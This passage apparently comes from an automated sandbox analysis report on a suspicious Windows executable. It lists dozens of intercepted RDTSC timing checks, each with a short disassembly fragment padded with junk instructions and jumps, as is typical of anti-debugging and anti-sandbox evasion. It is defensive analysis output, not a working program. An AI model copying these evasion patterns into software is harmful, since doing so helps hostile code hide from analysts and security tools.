Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6612B second address: C66149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FBCB0E4CF6Ch 0x0000000c jl 00007FBCB0E4CF66h 0x00000012 popad 0x00000013 push eax 0x00000014 jo 00007FBCB0E4CF74h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C66149 second address: C6614D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6AEAE second address: C6AEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6AEB5 second address: C6AECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007FBCB0ED6613h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C6AECA second address: C6AECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C739B0 second address: C739D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FBCB0ED65F8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C730D0 second address: C730F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FBCB0E4CF73h 0x0000000b jng 00007FBCB0E4CF66h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C730F8 second address: C730FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C730FC second address: C73133 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBCB0E4CF72h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnc 00007FBCB0E4CF66h 0x00000012 pop ecx 0x00000013 jnp 00007FBCB0E4CF74h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C733B5 second address: C733BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C733BE second address: C733CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jnc 00007FBCB0E4CF6Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C733CF second address: C733E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FBCB0ED65F8h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f jo 00007FBCB0ED65F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C02A7D second address: C02AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FBCB0E4CF72h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C02AAE second address: C02AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C02AB4 second address: C02AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7C2ED second address: C7C2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7C2F1 second address: C7C2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0459A second address: C045BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBCB0ED6609h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C045BC second address: C045DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBCB0E4CF73h 0x0000000f jnl 00007FBCB0E4CF66h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB56 second address: C7CB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB5C second address: C7CB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB61 second address: C7CB7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FBCB0ED65F6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CB7E second address: C7CB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CC70 second address: C7CC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C7CD30 second address: C7CD35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81DF3 second address: C81DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81DF9 second address: C81E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCB0E4CF6Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C80AD7 second address: C80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C80ADD second address: C80AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C80AE1 second address: C80AEB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBCB0ED65F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81210 second address: C8121B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBCB0E4CF66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C813B2 second address: C813B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81820 second address: C81856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Eh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0E4CF6Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCB0E4CF72h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81856 second address: C8185C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C8185C second address: C81862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C81B59 second address: C81B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4EB9D second address: C4EBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBCB0E4CF68h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 sub edx, 50016EA6h 0x0000002c lea eax, dword ptr [ebp+12B708F4h] 0x00000032 mov dword ptr [ebp+129C291Fh], eax 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b ja 00007FBCB0E4CF68h 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4EBE8 second address: C34718 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FBCB0ED6604h 0x00000011 nop 0x00000012 push edi 0x00000013 movzx edi, dx 0x00000016 pop edx 0x00000017 call dword ptr [ebp+129C1B9Eh] 0x0000001d pushad 0x0000001e jmp 00007FBCB0ED6602h 0x00000023 push eax 0x00000024 jbe 00007FBCB0ED65F6h 0x0000002a pop eax 0x0000002b jnp 00007FBCB0ED65FCh 0x00000031 je 00007FBCB0ED65F6h 0x00000037 pushad 0x00000038 jl 00007FBCB0ED65F6h 0x0000003e jmp 00007FBCB0ED6603h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F093 second address: C4F097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F160 second address: C4F165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F1D7 second address: C4F20A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 5FCF2681h 0x0000000e jng 00007FBCB0E4CF72h 0x00000014 jl 00007FBCB0E4CF6Ch 0x0000001a add dword ptr [ebp+129C29C9h], ebx 0x00000020 call 00007FBCB0E4CF69h 0x00000025 push eax 0x00000026 push edx 0x00000027 jng 00007FBCB0E4CF68h 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F20A second address: C4F229 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCB0ED65FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FBCB0ED6602h 0x00000011 jnp 00007FBCB0ED65FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F2D0 second address: C4F2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F2D4 second address: C4F2DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F94F second address: C4F967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007FBCB0E4CF66h 0x00000011 je 00007FBCB0E4CF66h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F967 second address: C4F96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4FAFC second address: C4FB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF6Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4FDD7 second address: C4FE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007FBCB0ED6602h 0x0000000d je 00007FBCB0ED65FCh 0x00000013 jbe 00007FBCB0ED65F6h 0x00000019 nop 0x0000001a adc ch, FFFFFFD4h 0x0000001d lea eax, dword ptr [ebp+12B70938h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FBCB0ED65F8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov dx, 9BA0h 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FBCB0ED6602h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4FE36 second address: C4FE3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCAD82 second address: CCAD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD2686 second address: CD26AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007FBCB0E4CF66h 0x0000000c popad 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 jng 00007FBCB0E4CF82h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBCB0E4CF6Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD26AE second address: CD26B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD2237 second address: CD225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Eh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0E4CF73h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD23D4 second address: CD23E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnp 00007FBCB0ED65F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD23E4 second address: CD23EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD5F48 second address: CD5F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBCB0ED65F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CDC23C second address: CDC260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007FBCB0E4CF66h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCB0E4CF74h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CDC260 second address: CDC283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCB0ED65FDh 0x00000008 jmp 00007FBCB0ED6601h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CDC283 second address: CDC289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101C8 second address: C101D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FBCB0ED65F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101D7 second address: C101DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101DB second address: C101EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBCB0ED65F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C101EF second address: C1020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBCB0E4CF76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CEA0FE second address: CEA10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007FBCB0ED65F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CEEB17 second address: CEEB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFE9B8 second address: CFE9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBCB0ED65F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFE9C6 second address: CFE9D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFEEA6 second address: CFEEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBCB0ED65F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFEEB7 second address: CFEEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFFC9A second address: CFFCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFFCA0 second address: CFFCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CFFCA4 second address: CFFCBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6605h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D03543 second address: D03547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D03547 second address: D03575 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBCB0ED6601h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FBCB0ED6601h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D033A5 second address: D033B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D055EB second address: D055EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D0516D second address: D05173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D05173 second address: D05177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D05177 second address: D051AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FBCB0E4CF6Bh 0x0000000c jmp 00007FBCB0E4CF76h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007FBCB0E4CF74h 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D052CB second address: D052D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D052D1 second address: D052DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D052DF second address: D052EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FBCB0ED65F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D0A344 second address: D0A35E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D0A35E second address: D0A36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D4AD84 second address: D4AD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Fh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D4AD9D second address: D4ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
